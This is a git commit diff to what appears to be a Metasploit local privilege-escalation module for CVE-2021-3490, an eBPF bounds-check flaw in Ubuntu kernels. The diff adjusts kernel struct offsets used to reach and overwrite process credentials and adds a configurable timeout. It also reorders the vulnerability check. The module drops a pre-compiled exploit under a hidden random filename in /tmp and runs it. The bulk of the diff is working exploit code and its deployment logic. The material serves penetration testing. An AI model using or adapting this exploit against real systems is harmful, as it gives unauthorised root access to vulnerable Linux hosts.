Fix up mistakes I noticed whilst doing edits on the code as well as some mistakes identified during peer review
This commit is contained in:
parent
d5df47692c
commit
b60ad3ee26
|
@ -36,6 +36,9 @@ Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58 and Ubuntu
|
|||
### WritableDir
|
||||
A folder we can write files to. Defaults to `/tmp`
|
||||
|
||||
### CmdTimeout
|
||||
The maximum number of seconds to wait for the exploit to run before we end up timing out. Increase this value if the exploit is timing out.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 21.04 (with Linux 5.11.0-16-generic)
|
||||
|
@ -167,7 +170,7 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
|
|||
```
|
||||
|
||||
|
||||
### Ubuntu 20.04 (with Linux 4.4.0-21-generic)
|
||||
### Ubuntu 20.10 (with Linux 5.8.0-25-generic)
|
||||
|
||||
```
|
||||
msf6 > use multi/handler
|
||||
|
|
|
@ -27,7 +27,7 @@
|
|||
// Offset of tasks field in pid structure
|
||||
#define PID_TASKS_OFFSET 0x10
|
||||
|
||||
// Offset of linked list entry in task_struct
|
||||
// Offset of the pid_links array in task_struct
|
||||
#ifdef GROOVY
|
||||
#define TASK_LIST_OFFSET 0x950
|
||||
#endif
|
||||
|
@ -38,7 +38,7 @@
|
|||
#ifdef GROOVY
|
||||
#define TASK_CRED_OFFSET 0xA88
|
||||
#endif
|
||||
#ifdef HIRSUTE
|
||||
#ifdef HIRSUTE
|
||||
#define TASK_CRED_OFFSET 0x6C8
|
||||
#endif
|
||||
|
||||
|
@ -99,7 +99,7 @@
|
|||
* entry. If any other entry in the array is non-NULL, @xa_head points
|
||||
* to an @xa_node.
|
||||
*/
|
||||
struct xarray
|
||||
struct xarray
|
||||
{
|
||||
int32_t xa_lock;
|
||||
int32_t xa_flags;
|
||||
|
@ -129,7 +129,7 @@ static inline void *xa_mk_internal(unsigned long v)
|
|||
#define radix_tree_node xa_node
|
||||
|
||||
|
||||
struct xa_node
|
||||
struct xa_node
|
||||
{
|
||||
unsigned char shift; /* Bits remaining in each slot */
|
||||
unsigned char offset; /* Slot offset in parent */
|
||||
|
@ -139,9 +139,9 @@ struct xa_node
|
|||
struct xarray *array; /* The array we belong to */
|
||||
char filler[0x10];
|
||||
void *slots[XA_CHUNK_SIZE];
|
||||
};
|
||||
};
|
||||
|
||||
struct idr
|
||||
struct idr
|
||||
{
|
||||
struct radix_tree_root idr_rt;
|
||||
unsigned int idr_base;
|
||||
|
@ -151,7 +151,9 @@ struct idr
|
|||
struct pid_namespace
|
||||
{
|
||||
#ifdef GROOVY
|
||||
uint64_t padding;
|
||||
uint64_t kref; /* From Linux kernel 5.11 this field was removed, however it is present in all previous versions.
|
||||
See https://elixir.bootlin.com/linux/v5.11-rc1/source/include/linux/pid_namespace.h and
|
||||
https://elixir.bootlin.com/linux/v5.10.60/source/include/linux/pid_namespace.h for a comparison */
|
||||
#endif
|
||||
struct idr idr;
|
||||
};
|
||||
|
|
|
@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
)
|
||||
register_advanced_options([
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 90])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -79,6 +80,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def check
|
||||
if unprivileged_bpf_disabled?
|
||||
return CheckCode::Safe('Unprivileged BPF loading is not permitted')
|
||||
end
|
||||
|
||||
vprint_good('Unprivileged BPF loading is permitted')
|
||||
|
||||
release = kernel_release
|
||||
version = kernel_version
|
||||
|
||||
|
@ -87,7 +94,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
version_array = release.split('-')
|
||||
major_version = version_array[0]
|
||||
minor_version = version_array[1]
|
||||
if Rex::Version.new(major_version) >= Rex::Version.new('5.12.0') # Aka we are past the 5.11.x kernel releases and into at the time of writing beta kernels, then its likely not vuln.
|
||||
if Rex::Version.new(major_version) >= Rex::Version.new('5.12.0') # Aka if we are past the 5.11.x kernel releases and into at the time of
|
||||
# writing beta versions of Ubuntu, then the target isn't vuln.
|
||||
return CheckCode::Safe("Target Ubuntu kernel version is #{major_version}-#{minor_version} which is not vulnerable!")
|
||||
elsif (Rex::Version.new(major_version) == Rex::Version.new('5.11.0')) && (Rex::Version.new(minor_version) >= Rex::Version.new('17.18'))
|
||||
return CheckCode::Safe('Target Ubuntu kernel version is running a 5.11.x build however it has updated to a patched version!')
|
||||
|
@ -102,12 +110,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
vprint_good("Kernel version #{release} appears to be vulnerable")
|
||||
|
||||
if unprivileged_bpf_disabled?
|
||||
return CheckCode::Safe('Unprivileged BPF loading is not permitted')
|
||||
end
|
||||
|
||||
vprint_good('Unprivileged BPF loading is permitted')
|
||||
|
||||
config = kernel_config
|
||||
|
||||
if config.nil?
|
||||
|
@ -132,10 +134,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
|
||||
end
|
||||
|
||||
# if live_compile?
|
||||
# vprint_status('Live compiling exploit on system...')
|
||||
# upload_and_compile(executable_path, exploit_data('cve-2017-16995', 'exploit.c'))
|
||||
# else
|
||||
executable_name = ".#{rand_text_alphanumeric(5..10)}"
|
||||
executable_path = "#{base_dir}/#{executable_name}"
|
||||
vprint_status('Dropping pre-compiled exploit on system...')
|
||||
|
@ -155,6 +153,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
# Launch exploit
|
||||
print_status('Launching exploit ...')
|
||||
cmd_exec(executable_path.to_s, payload_path.to_s, 150)
|
||||
cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue